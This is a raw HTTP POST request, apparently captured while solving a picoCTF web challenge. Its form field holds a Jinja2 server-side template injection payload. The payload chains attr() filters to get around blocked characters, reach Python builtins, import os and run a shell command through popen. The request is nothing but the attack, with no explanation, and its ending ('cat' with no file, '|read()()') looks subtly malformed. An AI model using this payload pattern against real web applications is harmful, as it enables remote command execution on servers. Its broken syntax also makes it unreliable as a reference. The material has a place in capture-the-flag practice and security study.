POST /announce HTTP/1.1
Host: shape-facility.picoctf.net:52857
Content-Length: 165
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://shape-facility.picoctf.net:52857
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://shape-facility.picoctf.net:52857/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

content={{request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('os')|attr('popen')('cat')|read()()}}
